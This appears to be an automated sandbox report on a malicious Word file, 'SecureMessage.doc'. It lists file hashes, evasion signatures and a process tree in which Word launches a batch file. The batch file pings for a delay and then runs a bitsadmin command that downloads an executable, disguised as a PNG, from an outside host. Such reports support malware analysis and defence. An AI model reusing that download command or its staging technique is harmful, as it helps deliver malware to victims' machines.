Analysis
- max time kernel: 107s
- max time network: 138s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 13-10-2021 15:11
Static task: static1
Behavioral task: behavioral1 (Sample: SecureMessage.doc; Resource: win7-en-20210920)
Behavioral task: behavioral2 (Sample: SecureMessage.doc; Resource: win10-en-20210920)
General
- Target: SecureMessage.doc
- Size: 82KB
- MD5: b6bf42a76eb8cea70cb0a9ba2b8f31d5
- SHA1: fc27036fefb683e218140e1f0af78f23d711a866
- SHA256: 3d808601a47c9ae6c1c121a5eb3297ebb8a75f3663cc425f92fc541b90c8200e
- SHA512: 8c0d9633420537bc3c8c16114959fd9648a31f7ca1fab536a67cd0ca6acb039769f9b0a4845679f32616dcbf16e1efbe6bbed9a53be43dc35cf5a06017e847e0
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
  - description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process; pid: 1052; pid_target: 2132; process: cmd.exe; target process: WINWORD.EXE
- Deletes itself (1 IoC)
  Processes:
  - pid: 2132; process: WINWORD.EXE
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; process: WINWORD.EXE
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString; process: WINWORD.EXE
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; process: WINWORD.EXE
- Download via BitsAdmin (1 TTP, 1 IoC)
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS; process: WINWORD.EXE
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; process: WINWORD.EXE
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU; process: WINWORD.EXE
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
  - pid: 2132; process: WINWORD.EXE (2 entries)
- Suspicious behavior: RenamesItself (1 IoC)
  Processes:
  - pid: 2132; process: WINWORD.EXE
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes:
  - pid: 2132; process: WINWORD.EXE (14 entries)
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
  - description: PID 2132 wrote to memory of 1052; pid: 2132; process: WINWORD.EXE; target process: cmd.exe (2 entries)
  - description: PID 1052 wrote to memory of 1968; pid: 1052; process: cmd.exe; target process: PING.EXE (2 entries)
  - description: PID 1052 wrote to memory of 464; pid: 1052; process: cmd.exe; target process: bitsadmin.exe (2 entries)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecureMessage.doc" /o ""
  - Deletes itself
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: RenamesItself
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe (depth 2)
    Command line: cmd.exe /c C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (depth 3)
      Command line: ping -n 30 127.0.0.1
      - Runs ping.exe
    - C:\Windows\system32\bitsadmin.exe (depth 3)
      Command line: bitsadmin /transfer backup /download /priority high https://usdata.estoreseller.com/images/logoimage.png "C:\Users\Admin\AppData\Roaming\zspriteimperturbably.exe"
      - Download via BitsAdmin
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
  MD5: 3c5d37bcc0200c0c5358e989fee78aa6
  SHA1: 2460dcf0890ddca0aac438bcbec80aea4ba1c633
  SHA256: 4dc218c92aa2b223437b34295ceb788ab098a6331d574408b024e8503f26d93c
  SHA512: c4d890c110140aa980756a3fdfc490805079132d0e17b35cbb6bdfda6682c8bd166de3d4c4246230ef4dc9453d616d8cff38c5b09f47f84ed44ef1a6b4eb5d30
- memory/464-319-0x0000000000000000-mapping.dmp
- memory/1052-281-0x0000000000000000-mapping.dmp
- memory/1968-284-0x0000000000000000-mapping.dmp
- memory/2132-116-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp (Filesize: 64KB)
- memory/2132-115-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp (Filesize: 64KB)
- memory/2132-117-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp (Filesize: 64KB)
- memory/2132-118-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp (Filesize: 64KB)
- memory/2132-119-0x000001B197040000-0x000001B197042000-memory.dmp (Filesize: 8KB)
- memory/2132-120-0x000001B197040000-0x000001B197042000-memory.dmp (Filesize: 8KB)
- memory/2132-121-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp (Filesize: 64KB)
- memory/2132-122-0x000001B197040000-0x000001B197042000-memory.dmp (Filesize: 8KB)